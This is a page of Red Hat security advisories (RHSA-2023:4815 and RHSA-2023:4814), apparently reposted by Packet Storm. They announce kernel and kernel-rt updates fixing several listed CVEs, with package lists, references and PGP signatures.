https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2124  
https://access.redhat.com/security/cve/CVE-2023-3090  
https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gWXAAoJENzjgjWX9erEuIAQAJLSO6VWBhkvMH9tC7wvr0k0  
UzL+aiaRvz1gxoNAG6SU9nFmT5VUCJl2GzCB+DbHocY/rYLsuiySLC5u3C2DvD0A  
Iy6GM0wHqqwzXOFIFV+vJGVZLWRQTwwiyzB4ajz/s80MDiEosqEBGaKH8bfJvttI  
hU2ZKcp+nN89e4XzILhU4okeePl01qUk4kMXjP4Zpe0NApRG0G6AagkVfkl1wrYR  
7rcHY4jcmEDjoTjPPPtrBIX2H+j4t/Y65se3NV3zf3P6gdhV6KWK5ubz8qGupa/d  
5u7mIYZLoDzdFVYoubvNwy8haqjKYEE/n7sfPxoQoA74JngJecSHIbp/Whq7WeT0  
zgGnIxGOUomJkSup+bIXv7xqWETvB4fCBl7lyvlFDP8zntG+nCZDgvZITy4EzRqg  
MU/oYJW2uHQKBG3rW3GYRUeO4QqYw0nfRffKFo7bk/ctsDGnuRHev8tdwAypqsk5  
KTu5gItO9SZfrdGYto/uMi03zPd3A05DuqwGbrQtY6yl3jsXdOd2659i2r8Ywx9f  
vzMU460ByrzUJeW3dR1S/+dbsYdCVsFxxWC2ANNBB9INmwyKyFjBd0JqeNwIs3c6  
nBQ8X6I12B4vGq8QA07YqVW1oi4P0KLfbDQB81o2Oa5MWp1ljtBGVwFCdTX2KX7K  
7cevgMNGsL8GsWzgIDNy  
=wJQe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4817-01

Red Hat Security Advisory 2023-4815-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include out of bounds access and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4815-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4815  
Issue date:        2023-08-29  
CVE Names:         CVE-2023-2124 CVE-2023-3090 CVE-2023-35788   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - noarch, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb  
(CVE-2023-3090)

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

* kernel: OOB access in the Linux kernel's XFS subsystem (CVE-2023-2124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Windows Server 2019 guest randomly pauses with "KVM: entry failed,  
hardware error 0x80000021", RHEL 8.8GA (BZ#2211657)

* rbd: avoid fast-diff corruption in snapshot-based mirroring, RHEL 8.9  
(BZ#2216772)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel's XFS subsystem  
2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
2218672 - CVE-2023-3090 kernel: ipvlan: out-of-bounds write caused by unclear skb->cb

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
kernel-4.18.0-193.113.1.el8_2.src.rpm

noarch:  
kernel-abi-whitelists-4.18.0-193.113.1.el8_2.noarch.rpm  
kernel-doc-4.18.0-193.113.1.el8_2.noarch.rpm

x86_64:  
bpftool-4.18.0-193.113.1.el8_2.x86_64.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kernel-4.18.0-193.113.1.el8_2.src.rpm

noarch:  
kernel-abi-whitelists-4.18.0-193.113.1.el8_2.noarch.rpm  
kernel-doc-4.18.0-193.113.1.el8_2.noarch.rpm

ppc64le:  
bpftool-4.18.0-193.113.1.el8_2.ppc64le.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-core-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.ppc64le.rpm  
perf-4.18.0-193.113.1.el8_2.ppc64le.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
python3-perf-4.18.0-193.113.1.el8_2.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm

x86_64:  
bpftool-4.18.0-193.113.1.el8_2.x86_64.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
kernel-4.18.0-193.113.1.el8_2.src.rpm

noarch:  
kernel-abi-whitelists-4.18.0-193.113.1.el8_2.noarch.rpm  
kernel-doc-4.18.0-193.113.1.el8_2.noarch.rpm

x86_64:  
bpftool-4.18.0-193.113.1.el8_2.x86_64.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2124  
https://access.redhat.com/security/cve/CVE-2023-3090  
https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gWOAAoJENzjgjWX9erEBFgP/1rlGhyS53mT0/iU1JkXZgOW  
D8FbyJ/0cjdc03f1xWPPwlg1/n4BsdQwpYiuxKjxj1DbhyoYfBUkQa61vHdONX5V  
o6zotd6o6JeO5R4LpEom91sPZKkESyzcaTPiONgeRUOnI0USQS3+NabqOKYU/52V  
RmsEe+bj8BLv+OhAhJTe5Cwb0d8GwEbN5cuDY0DA78HImFUPFBLfhgdXAlotf2yf  
+E9+kbepUCzNQS0kR53Gu/S4rqWD93oXNnQBmURLW+ol34rjps9Cr+de2kYwg4Ka  
g0Nm2wuiXL6O2ny5oKFRwJmtUiEW8Ms3kvMyv/w6KkiXmFLmDBU/6rt1DOWzPhoE  
DT+s6BL+PKUbgLF5Nb/VA0/cSKRePFZa5WTwXYULK1i/ti6yJ66Sz2wN3SPFIAE0  
n4ftPIxlAsykr2tccHfibbP2pELvIEDmlWYJHDrZInX/5hwff48elYbEXqqYcZfH  
EZ8gHwtz277eaj2miHGh7nD1IJ6jkGdMZrydi4brRnTFm47bA90EymwDjPkr6qVN  
w3jhFXr88GPyVQlNOb+CMMQpUkkeOaRa4GkCmetvHVjo5k3J7vrZGSNQlVyOfCCA  
PcI6gSfLtUkvMhUDdNlYQRFuAT+2QWJWd2/mdYWo1vSdecaO2LcFZjYR1NiDu8o+  
0Qr3PyX3OVG1CZO65ZIk  
=nbVf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4815-01

Red Hat Security Advisory 2023-4814-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include null pointer, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:4814-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4814  
Issue date:        2023-08-29  
CVE Names:         CVE-2022-1353 CVE-2022-39188 CVE-2023-0458   
                   CVE-2023-3090 CVE-2023-28466   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.9.0) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb  
(CVE-2023-3090)

* kernel: kernel info leak issue in pfkey_register (CVE-2022-1353)

* kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings  
leads to stale TLB entry (CVE-2022-39188)

* kernel: speculative pointer dereference in do_prlimit() in kernel/sys.c  
(CVE-2023-0458)

* kernel: tls: race condition in do_tls_getsockopt may lead to  
use-after-free or NULL pointer dereference (CVE-2023-28466)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.0.z11 Batch  
(BZ#2219867)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2066819 - CVE-2022-1353 kernel: kernel info leak issue in pfkey_register  
2130141 - CVE-2022-39188 kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings leads to stale TLB entry  
2179000 - CVE-2023-28466 kernel: tls: race condition in do_tls_getsockopt may lead to use-after-free or NULL pointer dereference  
2193219 - CVE-2023-0458 kernel: speculative pointer dereference in do_prlimit() in kernel/sys.c  
2218672 - CVE-2023-3090 kernel: ipvlan: out-of-bounds write caused by unclear skb->cb

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.70.1.rt21.141.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-kvm-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.70.1.rt21.141.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.70.1.rt21.141.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1353  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2023-0458  
https://access.redhat.com/security/cve/CVE-2023-3090  
https://access.redhat.com/security/cve/CVE-2023-28466  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gWBAAoJENzjgjWX9erETOQP/j3T/fKPnQivokxkzAUqvhiO  
sRz6YrGeUerXMXIPpy0V3COunzAYHQ7a1TCYyzd31gVdOCmx6lPlteL7PqgZe0C4  
+XFMS4kRfnT0UmWiXOXj44BL6IB5Vzs0THO2sP7tTWo439n26SI5cSo0NFSBAcXC  
IzYEyS+ciOrmBgplyz5j+3m+EOXypnaUNC2lC0oAJesDNrD/6HY+SJceiHtnZ4Zf  
NdlQg9lYA6bNHSORDfDq7ozwEAdEdGZQ5PSr2hMehYNE2g3C/XleZIj/uQuLOjf6  
nZjfsuQcOgHIxMgO0L3CuoGhz+VRJfiSUrpPCFEbWvKtHpEwbaYW3zmt3F8wXHLr  
pOt4CzpSU0rezNcurAf59fRI2sExEJfybI4VwZfCqyLKMi/KcCk23c1WThWJNbwk  
WCrIkdjdOZLmbK4gez/o1V/OkZbRt6HO/khC3a/I2WNPLjr/gVDVui8C7jQ13ueH  
a5i747NgSHF01yTr3XJmRSzmLl2S/VdHHCH0pjL7YsF9TjeJT1uA3hhpQA9mQNj4  
shKSxOO74Djr26j/o4AO4+6WlKnCOH2QTREFEKhVN47vYYNNrgps10b4vDZ0yg2T  
2uuyO0pprQeMtKcqbI5d1flSSjtlHx9iSD5IUFY7PsDmZi7DIKJTEpI0IiWZ3pP6  
dpbNLQYJv2EDCEvyiBnz  
=bAxY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm